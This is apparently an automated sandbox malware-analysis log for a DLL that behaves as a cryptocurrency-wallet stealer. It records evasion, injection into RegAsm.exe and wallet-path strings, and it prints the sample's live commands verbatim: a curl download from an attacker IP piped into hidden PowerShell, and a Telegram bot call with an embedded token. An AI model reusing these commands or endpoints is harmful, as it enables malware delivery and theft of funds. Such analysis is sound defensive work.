            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 7880, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 6588, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe System information queried: FirmwareTableInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 43_2_01443EB4 sldt word ptr [eax] 43_2_01443EB4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3861
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2505
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5204
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1292
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4886
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1256
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3846
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3406
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6188
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2553
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6272
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2808
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4871
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3416
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5912
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3726
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll
            Source: C:\Windows\System32\loaddll32.exe API coverage: 9.6 %
            Source: C:\Windows\SysWOW64\regsvr32.exe API coverage: 7.9 %
            Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 8.7 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep count: 3861 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep count: 2505 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360 Thread sleep time: -14757395258967632s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1620 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272 Thread sleep count: 5204 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244 Thread sleep count: 1292 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7364 Thread sleep time: -15679732462653109s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7236 Thread sleep count: 4886 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -16602069666338586s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7236 Thread sleep count: 1256 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep count: 3846 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520 Thread sleep count: 3406 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572 Thread sleep time: -17524406870024063s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876 Thread sleep count: 6188 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8136 Thread sleep time: -19369081277395017s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896 Thread sleep count: 2553 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8076 Thread sleep count: 6272 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8064 Thread sleep count: 2808 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8140 Thread sleep time: -23980767295822402s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8036 Thread sleep count: 4871 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep time: -19369081277395017s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8004 Thread sleep count: 3416 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7340 Thread sleep count: 5912 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280 Thread sleep count: 3726 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260 Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7328 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7212 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7324 Thread sleep time: -150000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7208Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1740 Thread sleep time: -90000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1740 Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F957B70 FindFirstFileExW,0_2_6F957B70
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6F957C21 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_6F957C21
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\3D Objects
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Packages
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\CEF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Mozilla
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 45_2_0043E110 LdrInitializeThunk,45_2_0043E110
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F9525AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F9525AB
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F95955B GetProcessHeap,0_2_6F95955B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F9525AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F9525AB
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F954D54 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6F954D54
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6F9520CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6F9520CC
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_6F9525AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F9525AB
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_6F954D54 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6F954D54
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_6F9520CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6F9520CC
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6F9525AB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6F9525AB
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6F954D54 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6F954D54
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6F9520CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6F9520CC

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match File source: Process Memory Space: powershell.exe PID: 7824, type: MEMORYSTR
            Source: 24.2.powershell.exe.4df8240.3.raw.unpack, ClasserPlus.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 24.2.powershell.exe.4df8240.3.raw.unpack, ClasserPlus.cs Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.0.cs
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 453000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A91008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 113A008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A8F008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8B2008
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF462.tmp" "c:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF463.tmp" "c:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF461.tmp" "c:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374.tmp" "c:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP"
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cmd.exe /c curl -s -h "x-special-header: qinx8f3tujdhxgoefpjjbaipyase1mobj2yryo2rjngnvdhjvevn8r2ku8opcbonhmpzfb2gyqpilhjq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -noprofile -executionpolicy bypass -windowstyle hidden -command -
            Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cmd.exe /c curl -s -h "x-special-header: qinx8f3tujdhxgoefpjjbaipyase1mobj2yryo2rjngnvdhjvevn8r2ku8opcbonhmpzfb2gyqpilhjq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -noprofile -executionpolicy bypass -windowstyle hidden -command -
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cmd.exe /c curl -s -h "x-special-header: qinx8f3tujdhxgoefpjjbaipyase1mobj2yryo2rjngnvdhjvevn8r2ku8opcbonhmpzfb2gyqpilhjq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -noprofile -executionpolicy bypass -windowstyle hidden -command -
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F952778 cpuid 0_2_6F952778
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F9521EE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6F9521EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: RegAsm.exe, 00000031.00000002.2171377376.0000000000D31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
            Source: RegAsm.exe, 00000031.00000002.2172670873.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: RegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
            Source: RegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: RegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: RegAsm.exe, 0000002C.00000002.2035425630.0000000000F1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: RegAsm.exe, 0000002B.00000002.2107744655.00000000013F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
